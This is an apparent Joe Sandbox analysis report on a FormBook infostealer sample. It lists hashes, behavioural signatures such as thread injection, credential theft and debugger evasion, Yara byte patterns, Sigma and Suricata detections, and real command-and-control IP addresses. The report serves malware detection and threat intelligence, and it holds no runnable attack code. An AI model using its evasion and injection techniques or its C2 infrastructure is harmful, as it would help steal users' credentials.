Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jpdy1E8K4A.exe

Overview

General Information

Sample name:jpdy1E8K4A.exe
renamed because original name is a hash value
Original sample name:64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56.exe
Analysis ID:1529045
MD5:473df0a675ceaba5a7c27f100e7d7491
SHA1:a3f60109a59e91a0e6443367b42a0ee8fd3feae6
SHA256:64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jpdy1E8K4A.exe (PID: 3992 cmdline: "C:\Users\user\Desktop\jpdy1E8K4A.exe" MD5: 473DF0A675CEABA5A7C27F100E7D7491)
    • svchost.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\jpdy1E8K4A.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • URUrIrqwFu.exe (PID: 2356 cmdline: "C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2732 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • firefox.exe (PID: 3060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ParentImage: C:\Users\user\Desktop\jpdy1E8K4A.exe, ParentProcessId: 3992, ParentProcessName: jpdy1E8K4A.exe, ProcessCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ProcessId: 6412, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ParentImage: C:\Users\user\Desktop\jpdy1E8K4A.exe, ParentProcessId: 3992, ParentProcessName: jpdy1E8K4A.exe, ProcessCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ProcessId: 6412, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:52:31.520083+020020507451Malware Command and Control Activity Detected192.168.2.65003285.159.66.9380TCP
            2024-10-08T15:53:20.979467+020020507451Malware Command and Control Activity Detected192.168.2.649932148.72.152.17480TCP
            2024-10-08T15:53:45.164677+020020507451Malware Command and Control Activity Detected192.168.2.6499883.33.130.19080TCP
            2024-10-08T15:53:58.879263+020020507451Malware Command and Control Activity Detected192.168.2.649994172.191.244.6280TCP
            2024-10-08T15:54:12.891516+020020507451Malware Command and Control Activity Detected192.168.2.649998172.96.191.3980TCP
            2024-10-08T15:54:26.225019+020020507451Malware Command and Control Activity Detected192.168.2.650003217.70.184.5080TCP
            2024-10-08T15:54:39.788673+020020507451Malware Command and Control Activity Detected192.168.2.65000763.250.47.4080TCP
            2024-10-08T15:54:53.318568+020020507451Malware Command and Control Activity Detected192.168.2.65001191.184.0.20080TCP
            2024-10-08T15:55:06.485146+020020507451Malware Command and Control Activity Detected192.168.2.65001513.248.169.4880TCP
            2024-10-08T15:55:34.514487+020020507451Malware Command and Control Activity Detected192.168.2.65002443.242.202.16980TCP
            2024-10-08T15:55:49.396086+020020507451Malware Command and Control Activity Detected192.168.2.650028103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:52:31.520083+020028554651A Network Trojan was detected192.168.2.65003285.159.66.9380TCP
            2024-10-08T15:53:20.979467+020028554651A Network Trojan was detected192.168.2.649932148.72.152.17480TCP
            2024-10-08T15:53:45.164677+020028554651A Network Trojan was detected192.168.2.6499883.33.130.19080TCP
            2024-10-08T15:53:58.879263+020028554651A Network Trojan was detected192.168.2.649994172.191.244.6280TCP
            2024-10-08T15:54:12.891516+020028554651A Network Trojan was detected192.168.2.649998172.96.191.3980TCP
            2024-10-08T15:54:26.225019+020028554651A Network Trojan was detected192.168.2.650003217.70.184.5080TCP
            2024-10-08T15:54:39.788673+020028554651A Network Trojan was detected192.168.2.65000763.250.47.4080TCP
            2024-10-08T15:54:53.318568+020028554651A Network Trojan was detected192.168.2.65001191.184.0.20080TCP
            2024-10-08T15:55:06.485146+020028554651A Network Trojan was detected192.168.2.65001513.248.169.4880TCP
            2024-10-08T15:55:34.514487+020028554651A Network Trojan was detected192.168.2.65002443.242.202.16980TCP
            2024-10-08T15:55:49.396086+020028554651A Network Trojan was detected192.168.2.650028103.224.182.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:53:36.628566+020028554641A Network Trojan was detected192.168.2.6499853.33.130.19080TCP
            2024-10-08T15:53:40.009901+020028554641A Network Trojan was detected192.168.2.6499863.33.130.19080TCP
            2024-10-08T15:53:41.676273+020028554641A Network Trojan was detected192.168.2.6499873.33.130.19080TCP
            2024-10-08T15:53:51.144200+020028554641A Network Trojan was detected192.168.2.649990172.191.244.6280TCP
            2024-10-08T15:53:53.660198+020028554641A Network Trojan was detected192.168.2.649992172.191.244.6280TCP
            2024-10-08T15:53:56.364368+020028554641A Network Trojan was detected192.168.2.649993172.191.244.6280TCP
            2024-10-08T15:54:05.215147+020028554641A Network Trojan was detected192.168.2.649995172.96.191.3980TCP
            2024-10-08T15:54:07.888162+020028554641A Network Trojan was detected192.168.2.649996172.96.191.3980TCP
            2024-10-08T15:54:10.367641+020028554641A Network Trojan was detected192.168.2.649997172.96.191.3980TCP
            2024-10-08T15:54:18.612381+020028554641A Network Trojan was detected192.168.2.649999217.70.184.5080TCP
            2024-10-08T15:54:21.136113+020028554641A Network Trojan was detected192.168.2.650001217.70.184.5080TCP
            2024-10-08T15:54:23.693625+020028554641A Network Trojan was detected192.168.2.650002217.70.184.5080TCP
            2024-10-08T15:54:32.059634+020028554641A Network Trojan was detected192.168.2.65000463.250.47.4080TCP
            2024-10-08T15:54:34.593707+020028554641A Network Trojan was detected192.168.2.65000563.250.47.4080TCP
            2024-10-08T15:54:37.140940+020028554641A Network Trojan was detected192.168.2.65000663.250.47.4080TCP
            2024-10-08T15:54:45.464154+020028554641A Network Trojan was detected192.168.2.65000891.184.0.20080TCP
            2024-10-08T15:54:47.997439+020028554641A Network Trojan was detected192.168.2.65000991.184.0.20080TCP
            2024-10-08T15:54:50.681531+020028554641A Network Trojan was detected192.168.2.65001091.184.0.20080TCP
            2024-10-08T15:54:58.830090+020028554641A Network Trojan was detected192.168.2.65001213.248.169.4880TCP
            2024-10-08T15:55:01.380573+020028554641A Network Trojan was detected192.168.2.65001313.248.169.4880TCP
            2024-10-08T15:55:04.112030+020028554641A Network Trojan was detected192.168.2.65001413.248.169.4880TCP
            2024-10-08T15:55:26.847034+020028554641A Network Trojan was detected192.168.2.65002143.242.202.16980TCP
            2024-10-08T15:55:29.531562+020028554641A Network Trojan was detected192.168.2.65002243.242.202.16980TCP
            2024-10-08T15:55:32.142489+020028554641A Network Trojan was detected192.168.2.65002343.242.202.16980TCP
            2024-10-08T15:55:40.590660+020028554641A Network Trojan was detected192.168.2.650025103.224.182.24280TCP
            2024-10-08T15:55:44.298531+020028554641A Network Trojan was detected192.168.2.650026103.224.182.24280TCP
            2024-10-08T15:55:46.851792+020028554641A Network Trojan was detected192.168.2.650027103.224.182.24280TCP
            2024-10-08T15:55:56.301612+020028554641A Network Trojan was detected192.168.2.65002985.159.66.9380TCP
            2024-10-08T15:55:59.785995+020028554641A Network Trojan was detected192.168.2.65003085.159.66.9380TCP
            2024-10-08T15:56:02.332989+020028554641A Network Trojan was detected192.168.2.65003185.159.66.9380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: jpdy1E8K4A.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: jpdy1E8K4A.exeJoe Sandbox ML: detected
            Source: jpdy1E8K4A.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose,5_2_02D5C2C0
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 4x nop then xor eax, eax3_2_0714EF2F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 4x nop then pop edi3_2_0714A773
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 4x nop then pop edi3_2_0714A7AC
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 4x nop then pop edi3_2_0714BA75
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax5_2_02D49B90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi5_2_02D62399
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h5_2_035804DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49932 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49932 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50024 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50011 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50015 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50007 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50015 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50028 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49998 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 103.224.182.242:80
